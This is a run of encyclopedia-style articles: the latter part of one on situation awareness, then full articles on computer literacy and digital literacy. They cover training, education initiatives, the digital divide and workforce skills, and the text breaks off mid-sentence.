assessment of the relationship between human performance and changes in the operator's physiology.[84] In other words, cognitive activity is associated with changes in the operator's physiological states. For example, the operator's overall functional state (as assessed using psycho-physiological measures, such as electroencephalography data, eyeblinks, and cardiac activity) may provide an indication as to whether the operator is sleep-fatigued at one end of the continuum, or mentally overloaded at the other end.[85] Other psycho-physiological measures, such as event-related potentials, event-related desynchronization, transient heart rate, and electrodermal activity, may be useful for evaluating an operator's perception of critical environmental cues, that is, for determining whether the operator has detected and perceived a task-relevant stimulus.[85] In addition, it is also possible to use psycho-physiological measures to monitor operators' environmental expectancies, that is, their physiological responses to upcoming events, as a measure of their current level of SA.[85] The multivariate nature of SA significantly complicates its quantification and measurement, as it is conceivable that a metric may only tap into one aspect of the operator's SA. Further, studies have shown that different types of SA measures do not always correlate strongly with each other.[c] Accordingly, rather than relying on a single approach or metric, valid and reliable measurement of SA should utilize a battery of distinct yet related measures that complement each other.[86] Such a multi-faceted approach to SA measurement capitalizes on the strengths of each measure while minimizing the limitations inherent in each.
Situation awareness is limited by sensory input and available attention, by the individual's knowledge and experience, and by their ability to analyse the available information effectively. Attention is a limited resource and may be reduced by distraction and task loading. Comprehension of the situation and projection of future status depend heavily on relevant knowledge, understanding, and experience in similar environments. Team SA is less limited by these factors, as there is a wider knowledge and experience base, but it is limited by the effectiveness of communication within the team.[87] Following Endsley's paradigm and combining a cognitive resource management model[88] with neurofeedback techniques, the Spanish pedagogue María Gabriela López García (2010) developed and implemented a new SA training pattern.[89] The first organization to implement this new pattern designed by López García was the SPAF (Spanish Air Force). She has trained EF-18 fighter pilots and Canadair firefighters.[90] This situation awareness training aims to avoid losing SA and to provide pilots with the cognitive resources to always operate below the maximum workload that they can withstand. This results not only in a lower probability of incidents and accidents due to human factors, but also in hours of operation at optimum efficiency, extending the operating life of systems and operators.[91] In first aid medical training provided by the American Red Cross, the need to be aware of the situation within the area of influence as one approaches an individual requiring medical assistance is the first aspect for responders to consider.[92] Examining the area and being aware of potential hazards, including the hazards which may have caused the injuries being treated, is an effort to ensure that responders do not themselves get injured and require treatment as well. Situation awareness for first responders in medical situations also includes evaluating and understanding what happened,[93] both to avoid injury to responders and to provide information to other rescue agencies which may need to know what the situation is, via radio, prior to their arrival on the scene. In a medical context, situation awareness is applied to avoid further injury to already-injured individuals, to avoid injury to medical responders, and to inform other potential responders of hazardous conditions prior to their arrival. A loss of situational awareness has led to many transportation accidents, including the 1991 Los Angeles Airport runway collision[94] and the 2015 Philadelphia train derailment.[95] Within the search and rescue context, situational awareness is applied primarily to avoid injury to search crews; being aware of the environment, the lay of the land, and the many other factors of influence within one's surroundings assists in the location of injured or missing individuals.[96] Public safety agencies are increasingly using situational awareness applications like Android Tactical Assault Kit on mobile devices, and even robots, to improve situational awareness.[97] In the United States Forest Service, the use of chainsaws and crosscut saws requires training and certification.[98] A great deal of that training describes situational awareness as an approach toward environmental awareness but also self-awareness,[99] which includes being aware of one's own emotional attitude, tiredness, and even caloric intake. Situational awareness in the forest context also includes evaluating the environment and the potential safety hazards within a saw crew's area of influence.
As a sawyer approaches a task, the ground, wind, cloud cover, hillsides, and many other factors are examined and considered proactively as part of trained sawyers' ingrained training. Dead or diseased trees within the reach of saw team crews are evaluated, as are the strength and direction of the wind. The lay of tree sections to be bucked, or the lean of a tree to be felled, is evaluated with awareness of where the tree will fall or move when cut, where the other members of the saw team are located, how they are moving, and whether hikers are within the area of influence, moving or stationary. Law enforcement training includes being situationally aware of what is going on around the police officer before, during, and after interactions with the general public,[100] while also being fully aware of what is happening around the officer in areas not currently the focus of the officer's immediate task. In cybersecurity, situational awareness for threat operations is the ability to perceive threat activity and vulnerability in context, so that data, information, knowledge, and wisdom can be actively defended from compromise. Situational awareness is achieved by developing and using solutions that often consume data and information from many different sources. Technology and algorithms are then used to apply knowledge and wisdom in order to discern patterns of behavior that point to possible, probable, and real threats. Situational awareness for cybersecurity threat operations teams appears in the form of a condensed, enriched, often graphical, prioritized, and easily searchable view of systems that are inside or related to security areas of responsibility (such as corporate networks or those used for national security interests). Different studies have analyzed the perception of security and privacy in the context of eHealth[101] and network security,[102] or used collaborative approaches to improve the awareness of users.[103] There are also research efforts to automate the processing of communication network information in order to obtain or improve cyber-situational awareness.[104] As the capabilities of technological agents increase, it becomes more important that their actions and underlying rationale become transparent. In the military realm, agent transparency has been investigated as unmanned vehicles are employed more frequently. In 2014, researchers at the U.S. Army Research Laboratory reported the Situation Awareness-based Agent Transparency (SAT) model, designed to increase transparency through user interface design. When it comes to automation, six barriers have been determined to discourage "human trust in autonomous systems, with 'low observability, predictability, directability and auditability' and 'low mutual understanding of common goals' being among the key issues."[105] The researchers at the U.S. Army Research Laboratory designed three levels of situational awareness transparency based on Endsley's theory of perception, comprehension, and projection. The greater the level of transparency, they claimed, the more information the agent conveys to the user.[106] A 2018 publication from the U.S. Army Research Laboratory evaluated how varying transparency levels in the SAT model affect operator workload and a human's understanding of when it is necessary to intervene in the agent's decision making. The researchers refer to this supervisory judgement as calibration.
The group split their SAT model research into two efforts: the Intelligent Agent Transparency in Human Agent Teaming for Multi-UxV Management (IMPACT) project and the Autonomous Squad Member (ASM) project.[105] Scientists provided three standard levels of SAT, in addition to a fourth level which included the agent's level of uncertainty in its decisions, in unmanned vehicles. The stated goal of this research was to determine how modifying levels of SAT affected user performance, situation awareness, and confidence in the agent. The scientists stated that their experimental results support the conclusion that increased agent transparency improved operator performance and human confidence in the agent without a significant effect on workload. When the agent communicated its level of uncertainty in the task assigned, those involved in the experiment displayed more trust in the agent.[107] The ASM research was conducted by providing a simulation game in which the participant had to complete a training course with an ASM, a ground robot that communicates with infantry. The participants had to multitask, evaluating potential threats while monitoring the ASM's communications on the interface. According to that research, experimental results demonstrated that the greatest confidence calibration occurred when the agent communicated information at all three levels of SAT.[107] The group of scientists from the U.S. Army Research Laboratory developed transparency visualization concepts in which the agents can communicate their plans, motivations, and projected outcomes through icons. The agent has been reported to be able to relate its resource usage, reasoning, predicted resource loss, progress towards task completion, and so on.[105] Unlike in the IMPACT research, when the agent informed the user of its level of uncertainty in decision making, no increase in trust was observed.[107] Crowdsourcing, made possible by the rise of social media and ubiquitous mobile access, has the potential to considerably enhance the situation awareness of both responsible authorities and citizens themselves in emergency and crisis situations by employing or using "citizens as sensors".[108][109][110][111][112][113][114][115] For instance, analysis of content posted on online social media like Facebook and Twitter using data mining, machine learning, and natural language processing techniques may provide situational information.[115] A crowdsourcing approach to sensing, particularly in crisis situations, has been referred to as crowdsensing.[116] Crowdmapping is a subtype of crowdsourcing[117][118] by which aggregated crowd-generated inputs, such as captured communications and social media feeds, are combined with geographic data to create a digital map that is as up-to-date as possible,[119][120][121][122] which can improve situational awareness during an incident and be used to support incident response.[123] A cloud-based geographic information system (GIS) with a display of structured data refers to a system that utilizes cloud computing technology to store, manage, analyze, and visualize geographic data in a structured format. This approach offers several advantages, including accessibility, scalability, and collaboration, compared to traditional on-premises GIS systems.
Its key components include cloud-based infrastructure, the geographic information system (GIS) itself, structured data storage, data analysis and processing, visualization tools, collaborative features, real-time updates, and integration with other cloud services. Overall, a cloud-based GIS with structured data display provides a dynamic and efficient platform for managing geographic information, making it accessible, scalable, and collaborative for a wide range of applications, from urban planning and environmental monitoring to business analytics and disaster response. There are two training scenarios designed to increase the situational awareness skills of military professionals and first responders in police and emergency services. The first, Kim's Game, is more commonly found in the Marine Corps sniper school and police academies. The name is derived from the novel Kim, in which the game features as a spy-school lesson. The game involves a tray with various items such as spoons, pencils, bullets, and any other items the soldiers would be familiar with. The participants are given one minute to view all of these items before they are covered up with a blanket. The participants then individually list the items that they saw; the one with the most correct answers wins the game. The same game is played in young scouting and girl guide groups as well to teach children quick memorisation skills. The second method is a more practical military application of Kim's Game. It starts with a field area (jungle, bush, or forest) about five meters wide and ten meters deep, in which various items, some camouflaged and some not, are placed on the ground and in the trees at eye level. Again, these items are ones that are familiar to the soldiers undergoing the exercise. The participants are given ten minutes to view the area from one place and take a mental note of the items they see. Once their ten minutes are up, each soldier is required to do a repetition of certain exercises, such as burpees, designed to simulate the stress of a physically demanding environment. Once the participants complete the exercise, they list the items they saw. The points are tallied at the end to find the winner.
https://en.wikipedia.org/wiki/Situation_awareness
Computer literacy is defined as the knowledge and ability to use computers and related technology efficiently, with skill levels ranging from elementary use to computer programming and advanced problem solving. Computer literacy can also refer to the comfort level someone has with using computer programs and applications. Another valuable component is understanding how computers work and operate. Computer literacy may be distinguished from computer programming, which primarily focuses on the design and coding of computer programs rather than the familiarity and skill in their use.[1] Various countries, including the United Kingdom and the United States, have created initiatives to improve national computer literacy rates. Computer literacy differs from digital literacy, which is the ability to communicate or find information on digital platforms.[2] Comparatively, computer literacy measures the ability to use computers and to maintain a basic understanding of how they operate.[3] A person's computer literacy is commonly measured through questionnaires, which test their ability to write and modify text, troubleshoot minor computer operating issues, and organize and analyze information on a computer.[4][5] To increase their computer literacy, computer users should distinguish which computer skills they want to improve, and learn to be more purposeful and accurate in their use of these skills. By learning more about computer literacy, users can discover more computer functions that are worth using.[6] Arguments for the use of computers in classroom settings, and thus for the promotion of computer literacy, are primarily vocational or practical. Computers are essential in the modern-day workplace.[4] The instruction of computer literacy in education is intended to provide students with employable skills.[1] Rapid changes in technology make it difficult to predict the next five years of computer literacy. Computer literacy projects have support in many countries because they conform to general political and economic principles of those countries' public and private organizations. The Internet offers great potential for the effective and widespread dissemination of knowledge and for the integration of technological advances. Improvements in computer literacy facilitate this.[7] The term "computer literacy" is usually attributed to Arthur Luehrmann, a physicist at Dartmouth College and a colleague of Kemeny and Kurtz, who introduced the BASIC programming language in 1964. Luehrmann became a tireless advocate of computers in teaching. At an April 1972 American Federation of Information Processing Societies (AFIPS) conference, Luehrmann gave a talk titled "Should the computer teach the student, or vice-versa?" The paper is available online. In it he notes: If the computer is so powerful a resource that it can be programmed to simulate the instructional process, shouldn't we be teaching our students mastery of this powerful intellectual tool? Is it enough that a student be the subject of computer administered instruction—the end user of a new technology? Or should his education also include learning to use the computer (1) to get information in the social sciences from a large database inquiry system, or (2) to simulate an ecological system, or (3) to solve problems by using algorithms, or (4) to acquire laboratory data and analyze it, or (5) to represent textual information for editing and analysis, or (6) to represent musical information for analysis, or (7) to create and process graphical information?
These uses of computers in education cause students to become masters of computing, not merely its subjects. In 1978, Andrew Molnar was director of the Office of Computing Activities at the National Science Foundation in the United States.[8][9] Shortly after its formation, computer literacy was discussed in several academic articles. In 1985, the Journal of Higher Education asserted that being computer literate involved mastering word processing, spreadsheet programs, and retrieving and sharing information on a computer.[10] Computer science and education researchers Seymour Papert, Cynthia Solomon, and Daniel McCracken advocated for programming as a rich and beneficial activity for young and old learners. In the 1970s and 1980s, creative technical writers including Bob Albrecht, David Ahl, Mitchell Waite, Peter Norton, and Dan Gookin created books and materials that taught computer programming to non-specialists and self-taught learners.[11] While programming lost traction in school districts as the core element of computer literacy, it gained ground in computer labs, user groups, community centers, and other informal settings, helping to propel the personal computer as a mass-market commercial product. Plan Calcul was a French governmental program in the 1960s to promote a national or European computer industry, accompanied by a vast educational effort in programming and computer science. The Computing for All plan was a French government initiative to introduce computers to all the country's pupils in 1985. In the United Kingdom, a number of prominent video game developers emerged in the late 1970s and early 1980s.[12] The ZX Spectrum, released in 1982, helped to popularize home computing, coding, and gaming in Britain and Europe.[13][14][15] The BBC Computer Literacy Project, using the BBC Microcomputer, ran from 1980 to 1989. This initiative educated a generation of coders in schools and at home, before the development of mass-market PCs in the 1990s.[16][17] 'Bedroom computer innovation' led to the development of early web-hosting companies aimed at businesses and individuals in the 1990s.[18] The BBC Computer Literacy Project 2012 was an initiative to develop students' marketable information technology and computer science skills. Computer programming skills were introduced into the National Curriculum in 2014.[19][20] It was reported in 2017 that roughly 11.5 million United Kingdom citizens did not have basic computer literacy skills.[21] In response, the United Kingdom government published a 'digital skills strategy' in 2017.[21][22][23] First released in 2012, the Raspberry Pi is a series of low-cost single-board computers originally intended to promote the teaching of basic computer science in schools in the UK.[24][25][26] Later, they became far more popular than anticipated and have been used in a wide variety of applications.[27] The Raspberry Pi Foundation promotes the teaching of elementary computer science in UK schools and in developing countries.[28] In 1978, the National Science Foundation put out a call to educate young people in computer programming.[29] To introduce students to computing, the U.S.
government, private foundations, and universities combined to fund and staff summer programs for high school students.[30][29] Students in the United States are introduced to tablet computers in preschool or kindergarten.[31] Tablet computers are preferred for their small size and touchscreens.[32] The touch user interface of a tablet computer is more accessible to the under-developed motor skills of young children.[33] Early childhood educators use student-centered instruction to guide young students through various activities on the tablet computer.[34] This typically includes Internet browsing and the use of applications, familiarizing the young student with a basic level of computer proficiency.[33] A concern raised within this topic of discussion is that primary and secondary education teachers are often not equipped with the skills to teach basic computer literacy.[31] In the United States job market, computer illiteracy severely limits employment options.[35][36] Non-profit organizations such as Per Scholas attempt to reduce the divide by offering free and low-cost computers to children and their families in under-served communities in the South Bronx, New York; Miami, Florida; and Columbus, Ohio.[37] In 2020, world averages in computer literacy, as determined by the World Economic Forum, revealed that the OECD countries were not as computer literate as one would expect. About a quarter of individuals did not know how to use a computer. At least 45% were rated poorly, and only 30% were rated as moderately to strongly computer literate.[38]
https://en.wikipedia.org/wiki/Computer_literacy
Digital literacy is an individual's ability to find, evaluate, and communicate information using typing or digital media platforms. Digital literacy combines technical and cognitive abilities; it consists of using information and communication technologies to create, evaluate, and share information,[1] or critically examining the social and political impacts of information and communication technologies.[2] Digital literacy initially focused on digital skills and stand-alone computers, but the advent of the internet and social media use has shifted some of its focus to mobile devices.[3] Research into digital literacies draws from traditions of information literacy and research into media literacy, which rely on socio-cognitive traditions, as well as from research into multimodal composition, which relies on anthropological methodologies.[4] Digital literacy is built on the expanding role of social science research in the field of literacy[5] as well as on concepts of visual literacy,[6] computer literacy,[7] and information literacy.[8] The concept of digital literacy has evolved throughout the 20th and into the 21st centuries, from a technical definition of skills and competencies to a broader comprehension of interacting with digital technologies.[9] Digital literacy is often discussed in the context of its precursor, media literacy. Media literacy education began in the United Kingdom and the United States due to war propaganda in the 1930s and the rise of advertising in the 1960s, respectively.[10] Manipulative messaging and the increase in various forms of media further concerned educators. Educators began to promote media literacy education to teach individuals how to judge and assess the media messages they were receiving. The ability to critique digital and media content allows individuals to identify biases and evaluate messages independently.[10] Both digital and media literacy include the ability to examine and comprehend the meaning of messages, judge credibility, and assess the quality of a digital work.[11] With the rise of file sharing on services such as Napster, an ethics element began to be included in definitions of digital literacy.[12] Frameworks for digital literacy began to include goals and objectives such as critically examining the political dimensions and power dynamics embedded in processes of digitization or datafication,[13] as well as understanding the importance of becoming a socially responsible member of one's community by spreading awareness and helping others find digital solutions at home, work, or on a national platform.[11] Digital literacy may also include the production of multimodal texts.[14] This definition refers more to reading and writing on a digital device but includes the use of any modes across multiple mediums that stress semiotic meaning beyond graphemes.[15] It also involves knowledge of producing other types of media, like recording and uploading video.[15] Overall, digital literacy shares many defining principles with other fields that use modifiers in front of the term "literacy" to define ways of being and domain-specific knowledge or competence.
The term has grown in popularity in education and higher education settings and is used in both international and national standards.[16] The pedagogy of digital literacy has begun to move across disciplines.[4] In academia, digital literacy is a part of the computing subject area alongside computer science and information technology,[17] while some literacy scholars have argued for expanding the framing beyond information and communication technologies and into literacy education overall.[18] Similar to other evolving definitions of literacy that recognize the cultural and historical ways of making meaning,[19] digital literacy does not replace traditional methods of interpreting information but rather extends the foundational skills of these traditional literacies.[20] Digital literacy should be considered a part of the path towards acquiring knowledge.[21] The current model of digital literacy explores six skills.[22] Digital literacy skills continue to develop with the rapid advancements of artificial intelligence (AI) technologies in the 21st century. AI technologies are designed to simulate human intelligence through the use of complex systems such as machine learning algorithms, natural language processing, and robotics.[24] As these technologies emerge, so have different attempts at defining AI literacy: the ability to understand the basic techniques and concepts behind AI in different products and services.[25] Many framings leverage existing digital literacy frameworks and apply an AI lens to their skills and competencies, and these frameworks share several common elements. Digital literacy is necessary for the correct use of various digital platforms. Literacy in social network services and Web 2.0 sites helps people stay in contact with others, pass on timely information, and even buy and sell goods and services. Digital literacy can also prevent people from being taken advantage of online, as photo manipulation, e-mail fraud, and phishing can often fool the digitally illiterate, costing victims money and making them vulnerable to identity theft.[30] However, those using technology and the internet to commit these manipulations and fraudulent acts possess the digital literacy abilities to fool victims by understanding technical trends and consistencies; it therefore becomes important for the digitally literate to think one step ahead when utilizing the digital world. The emergence of social media has paved the way for people to communicate and connect with one another in new and different ways.[31] Websites like Facebook and Twitter (now X), as well as personal websites and blogs, have enabled a new type of journalism that is subjective, personal, and "represents a global conversation that is connected through its community of readers."[32] These online communities foster group interactivity among the digitally literate. Social media also help users establish a digital identity, or a "symbolic digital representation of identity attributes."[33] Without digital literacy, or the assistance of someone who is digitally literate, one cannot possess a personal digital identity (this is closely allied to web literacy). Research has demonstrated that differences in the level of digital literacy depend mainly on age and education level, while the influence of gender is decreasing.[34][35][36] Among young people, digital literacy is high in its operational dimension. Young people rapidly move through hypertext and have a familiarity with different kinds of online resources.
However, for young people, the skills needed to critically evaluate content found online show a deficit.[37] With the rise of digital connectivity amongst young people, concerns about digital safety are higher than ever. A study conducted in Poland, commissioned by the Ministry of National Education, measured the digital literacy of parents with regard to digital and online safety. It concluded that parents often overestimate their level of knowledge, but clearly have an influence on their children's attitude and behavior towards the digital world. It suggests that, with proper training programs, parents could gain the knowledge to teach their children about the safety precautions necessary to navigate the digital space.[38] The digital divide refers to disparities (such as those between the developed and the developing world) concerning access to and use of information and communication technologies (ICT),[39] such as computer hardware, software, and the Internet, among people.[40] Individuals within societies that lack the economic resources to build ICT infrastructure do not have adequate digital literacy, which means that their digital skills are limited.[41] The divide can be explained by Max Weber's social stratification theory, which focuses on access to production rather than ownership of capital.[42] Production here means having access to ICT so that individuals can interact and produce information or create a product, without which they cannot participate in learning, collaboration, and production processes.[42] Digital literacy and digital access have become increasingly important competitive differentiators for individuals using the internet.[43] In the article "The Great Class Wedge and the Internet's Hidden Costs", Jen Schradie discusses how social class can affect digital literacy,[21] creating a digital divide. Research published in 2012 found that the digital divide, as defined by access to information technology, does not exist amongst youth in the United States.[44] Young people report being connected to the internet at rates of 94–98%.[44] There remains, however, a civic opportunity gap, where youth from poorer families and those attending lower socioeconomic status schools are less likely to have opportunities to apply their digital literacy.[45] The digital divide has also been defined as emphasizing the distinction between the "haves" and "have-nots", presenting all data separately for rural, urban, and central-city categories.[46] Existing research on the digital divide also reveals the existence of personal categorical inequalities between young and old people.[47] An additional interpretation identifies the gap between the technology accessed by youth outside and inside the classroom.[48] Media theorist Henry Jenkins coined the term participation gap[49] and distinguished it from the digital divide.[10] According to Jenkins, in countries like the United States, where nearly everyone has access to the internet, the concept of the digital divide does not provide enough insight. As such, Jenkins uses the term participation gap to develop a more nuanced view of access to the internet.
Instead of referring to the "haves" vs "have-nots" of digital technologies, Jenkins proposes that the participation gap refers to people who have sustained access to and competency with digital technologies due to media convergence.[50] Jenkins states that students learn different sets of technology skills if they only have access to the internet in a library or school.[51] In particular, Jenkins observes that students who have access to the internet at home have more opportunities to develop their skills and face fewer limitations, such as the computer time limits and website filters commonly used in libraries.[51] The participation gap is geared toward millennials, who, as of 2008 when this study was created, were the oldest generation born in the age of technology. Since then, more technology has been integrated into the classroom. The issue is that some students have internet access at home equivalent to what they interact with in class, while others have access only at school or in a library; the latter do not get the same amount or quality of digital experience. This creates the participation gap, along with an inability to develop digital literacy.[52] Digital rights are an individual's rights that allow them freedom of expression and opinion in an online setting, with roots centered on human theoretical and practical rights. The concept encompasses an individual's privacy rights when using the Internet,[53] and is essentially concerned with how individuals use different technologies and how content is distributed and mediated.[54] Government officials and policymakers use digital rights as a springboard for enacting and developing policies and laws to establish rights online in the same way that we obtain rights in real life. Private organizations that possess their own online infrastructures also develop rights specific to their property.[55] In today's world most, if not all, materials have shifted into an online setting, and public policy has had a major influence in supporting this movement.[56] Going beyond traditional academics, ethical rights such as copyright, citizenship, and conversation can be applied to digital literacy, because tools and materials nowadays can be easily copied, borrowed, stolen, and repurposed; literacy is collaborative and interactive, especially in a networked world.[57] Digital citizenship refers to the "right to participate in society online". It is connected to the notion of state-based citizenship, which is determined by the country or region in which one was born, and concerns being a dutiful citizen who participates in the electoral process and online through mass media.[55] A literate digital citizen possesses the skills to read, write, and interact with online communities via screens and has an orientation towards social justice. This is best described in the article "Digital Citizenship during a Global Pandemic: Moving beyond Digital Literacy": "Critical digital civic literacy, as is the case of democratic citizenship more generally, requires moving from learning about citizenship to participating and engaging in democratic communities face‐to‐face, online, and in all the spaces in between."[58] Through the various digital skills and literacy one gains, one is able to effectively solve social problems that might arise on social platforms.
Additionally, digital citizenship has three online dimensions: higher wages, democratic participation, and better communication opportunities that arise from the digital skills acquired.[59] Digital citizenship also refers to online awareness and the ability to be safe and responsible online. This idea arose from the rise of social media in the past decade, which has enhanced global connectivity and enabled faster interaction. The idea of a good 'digital citizen' directly correlates with knowledge of, for example, how to react to instances of predatory online behavior, such as cyberbullying.[60] Marc Prensky invented and popularized the terms digital natives and digital immigrants. A digital native is an individual born into the digital age who has used and applied digital skills from a young age,[61] whereas a 'digital immigrant' is an individual who adopts technology later in life. These two groups of people have had different interactions with technology since birth, creating a generational gap.[62] This directly links to their individual and unique relationships with digital literacy. Digital natives brought about the creation of ubiquitous information systems (UIS). These systems include mobile phones, laptop computers, and personal digital assistants, as well as digital technology embedded in cars and buildings (smart cars and smart homes), creating a new and unique technological experience. Carr claims that digital immigrants, although they adapt to the same technology as natives, possess a sort of "accent" that prevents them from communicating the way natives do. Research shows that, due to the brain's malleable nature, technology has changed the way today's students read, perceive, and process information.[63] Marc Prensky believes this is a problem, because today's students have a vocabulary and skill set that educators (digital immigrants at the time of his writing) may not fully understand.[61] Statistics and popular representations of the elderly portray them as digital immigrants. For example, in Canada in 2010, it was found that 29% of its citizens aged 75 and older, and 60% of those aged 65 to 74, had browsed the internet in the past month.[64] Conversely, internet activity reached almost 100% among its 15- to 24-year-old citizens.[64] However, the concept of the digital native has been contested. According to two studies, students over the age of 30 were more likely to possess characteristics of a digital native than their younger peers; 58% of the students that participated were over 30 years old.[65] One study, conducted by Margaryan, Littlejohn, and Vojt (2011), found that while college students born after 1984 frequently used the internet and other digital technology, they showed restricted use of technologies for educational and socializing purposes.[65] Another study, conducted at Hong Kong University, found that young students use technology as a means of consuming entertainment and ready-made content rather than creating content or engaging with academic content.[65] Society is trending towards a technology-dependent world.[66] It is now necessary to implement digital technology in education;[66] this often includes having computers in the classroom, the use of educational software to teach curricula, and course materials that are made available to students online. Students are often taught literacy skills such as how to verify credible sources online, cite websites, and prevent plagiarism.
Google and Wikipedia are frequently used by students "for everyday life research,"[67] and are just two common tools that facilitate modern education. Digital technology has impacted the way materials are taught in the classroom. Digital literacy not only helps students navigate online information but also enhances their ability to critically evaluate, synthesize, and apply digital content in academic and real-world settings.[68] With the use of technology rising in this century, educators are altering traditional forms of teaching to include course material on concepts related to digital literacy.[69] Educators have also turned to social media platforms to communicate and share ideas with one another.[69] Social media and social networks have become a crucial part of the information landscape. Social media allows educators to communicate and collaborate with one another without having to use traditional educational tools.[71] Restrictions such as time and location can be overcome with the use of social media-based education.[71] New models of learning are being developed with digital literacy in mind. Several countries have developed their own models emphasizing ways of finding and implementing new digital didactics, identifying opportunities and trends via surveys of educators and college instructors.[72] Additionally, these new models of learning in the classroom have aided in promoting global connectivity, enabling students to become globally minded citizens. According to one study by Stacy Delacruz, virtual field trips (VFTs), a new form of multimedia presentation, have gained popularity over the years because they offer the "opportunity for students to visit other places, talk to experts and participate in interactive learning activities without leaving the classroom". They have been used as a vessel for supporting cross-cultural collaboration amongst schools, including: "improved language skills, greater classroom engagement, deeper understandings of issues from multiple perspectives, and an increased sensitivity to multicultural differences". They also allow students to be the creators of their own digital content, a core standard of the International Society for Technology in Education (ISTE).[73] The COVID-19 pandemic pushed education towards a more digital and online experience, in which teachers had to adapt to new levels of digital competency in software to continue the education system.[74] As academic institutions discontinued in-person activity,[75] different online meeting platforms were utilized for communication.[75] An estimated 84% of the global student body was affected by this sudden closure due to the pandemic.[76] Because of this, there was a clear disparity in student and school preparedness for digital education, due in large part to a divide in digital skills and literacy that both students and educators experienced.[77] Some countries were better prepared: Croatia, for example, had already begun work on digitalizing its schools countrywide. In a pilot initiative, 920 instructors and over 6,000 pupils from 151 schools received computers, tablets, and presentation equipment, as well as improved connectivity and teacher training, so that when the pandemic struck, pilot schools were ready to begin offering online programs within two days.[78] The switch to online learning has brought about some concerns regarding learning effectiveness, exposure to cyber risks, and lack of socialization.
These prompted the need to implement changes in how students can learn much-needed digital skills and develop digital literacy.[76] In response, the DQ (Digital Intelligence) Institute designed a common framework for enhancing digital literacy, digital skills, and digital readiness.[79] Attention and focus were also brought to the development of digital literacy in higher education. A study in Spain measured the digital knowledge of 4,883 teachers of all education levels over recent school years and found that they needed further training to advance new learning models for the digital age. These programs were proposed using the joint framework of INTEF (National Institute of Educational Technologies and Teacher Training) as a reference.[74] In Europe, the Digital Competence of Educators framework (DigCompEdu) was developed to address and promote the development of digital literacy. It is divided into six branches: professional engagement, digital resources, teaching and learning, assessment, empowerment of learners, and the facilitation of learners' digital competence.[80] The European Commission also developed the "Digital Education Action Plan", which focuses on using the COVID-19 pandemic experience to learn how technology is being used on a large scale for education, and on adapting the systems used for learning and training in the digital age. The framework is divided into two main strategic priorities: fostering the development of a high-performing digital education ecosystem, and enhancing digital skills and competencies for digital transformation.[81] In 2013, the Open Universiteit Nederland released an article defining twelve digital competence areas, based on the knowledge and skills people have to acquire to be digitally literate.[82] The competencies build on each other: competencies A, B, and C are the basic knowledge and skills a person must have to be fully digitally literate, and once these three are acquired, one can build upon that knowledge and those skills to acquire the other competencies. University of Southern Mississippi professor Dr. Suzanne Mckee-Waddell[83] conceptualized the idea of digital composition as the ability to integrate multiple forms of communication technologies and research to create a better understanding of a topic.[vague] Digital writing is a pedagogy that is being taught increasingly in universities. It is focused on the impact technology has had on various writing environments; it is not simply the process of using a computer to write. Educators in favor of digital writing argue that it is necessary because "technology fundamentally changes how writing is produced, delivered, and received."[84] The goal of teaching digital writing is for students to increase their ability to produce a relevant, high-quality product, instead of just a standard academic paper.[85] One aspect of digital writing is the use of hypertext or LaTeX.[86] As opposed to printed text, hypertext invites readers to explore information in a non-linear fashion. Hypertext consists of traditional text and hyperlinks that send readers to other texts. These links may refer to related terms or concepts (as is the case on Wikipedia), or they may enable readers to choose the order in which they read. The process of digital writing requires the composer to make unique "decisions regarding linking and omission."
These decisions "give rise to questions about the author's responsibilities to the [text] and objectivity."[87] The US 2014 Workforce Innovation and Opportunity Act (WIOA) defines digital literacy skills as a workforce preparation activity.[88] In the modern world, employees are expected to be digitally literate, having full digital competence.[89] Those who are digitally literate are more likely to be economically secure,[90] as many jobs require a working knowledge of computers and the Internet to perform basic tasks. Additionally, digital technologies such as mobile devices, production suites, and collaboration platforms are ubiquitous in most office workplaces and are often crucial to daily tasks, since many white-collar jobs today are performed primarily using digital devices and technology.[91] Many of these jobs require proof of digital literacy to be hired or promoted. Sometimes companies will administer their own tests to employees, or official certification will be required. A study on the role of digital literacy in the EU labour market found that individuals were more likely to be employed the more digitally literate they were.[92] As technology has become cheaper and more readily available, more blue-collar jobs have required digital literacy as well. Manufacturers and retailers, for example, are expected to collect and analyze data about productivity and market trends to stay competitive. Construction workers often use computers to increase employee safety.[90] In this context, it is essential for executives to "digitally upskill" their employees. Only with efficient training programs and a general willingness among the workforce can technological solutions be used to their full potential.[93] The acquisition of digital literacy is also important when it comes to starting and growing new ventures. The emergence of the World Wide Web and other digital platforms has led to a plethora of new digital products or services[94] that can be bought and sold. Entrepreneurs are at the forefront of this development, using digital tools or infrastructure[95] to deliver physical products, digital artifacts,[96] or internet-enabled service innovations.[97] Research has shown that digital literacy for entrepreneurs consists of four levels (basic usage, application, development, and transformation) and three dimensions (cognitive, social, and technical).[98] At the lowest level, entrepreneurs need to be able to use access devices as well as basic communication technologies to balance safety and information needs. As they move to higher levels of digital literacy, entrepreneurs become able to master and manipulate more complex digital technologies and tools, enhancing the absorptive capacity and innovative capability of their venture. In a similar vein, if small to medium enterprises (SMEs) possess the ability to adapt to dynamic shifts in technology, they can take advantage of trends, marketing campaigns, and communication with consumers to generate more demand for their goods and services. Moreover, if entrepreneurs are digitally literate, online platforms like social media can further help businesses receive feedback and generate community engagement that could boost their performance as well as their brand image. A research paper published in The Journal of Asian Finance, Economics, and Business provides critical insight suggesting that digital literacy has the greatest influence on the performance of SME entrepreneurs.
The authors suggest their findings can help craft performance development strategies for SME entrepreneurs, arguing that their research shows the essential contribution of digital literacy to developing business and marketing networks.[99] Additionally, the study found that digitally literate entrepreneurs can communicate with and reach wider markets than non-digitally literate entrepreneurs through the use of web-management and e-commerce platforms supported by data analysis and coding. That said, constraints do exist for SMEs using e-commerce, including a lack of technical understanding of information technologies and the high cost of internet access (especially for those in rural or underdeveloped areas).[100] The United Nations included digital literacy in its Sustainable Development Goals for 2030, under thematic indicator 4.4.2, which encourages the development of digital literacy proficiency in teens and adults to facilitate educational and professional opportunities and growth.[101] International initiatives like the Global Digital Literacy Council (GDLC) and the Coalition for Digital Intelligence (CDI) have also highlighted the need for digital literacy and strategies to address it on a global scale.[102][103] The CDI, under the umbrella of the DQ Institute, created the Common Framework for Digital Literacy, Skills, and Readiness in 2019, which conceptualizes eight areas of digital life: identity, use, safety, security, emotional intelligence, communication, literacy, and rights; three levels of maturity: citizenship, creativity, and competitiveness; and three components of competency: knowledge, attitudes and values, and skills.[104] The UNESCO Institute for Statistics (UIS) also works to create, gather, map, and assess common frameworks on digital literacy across multiple member states around the world.[105][106] In an attempt to narrow the digital divide, on September 26, 2018, the United States Senate Foreign Relations Committee passed legislation to help provide access to the internet in developing countries via the H.R.600 Digital Global Access Policy Act. The legislation itself 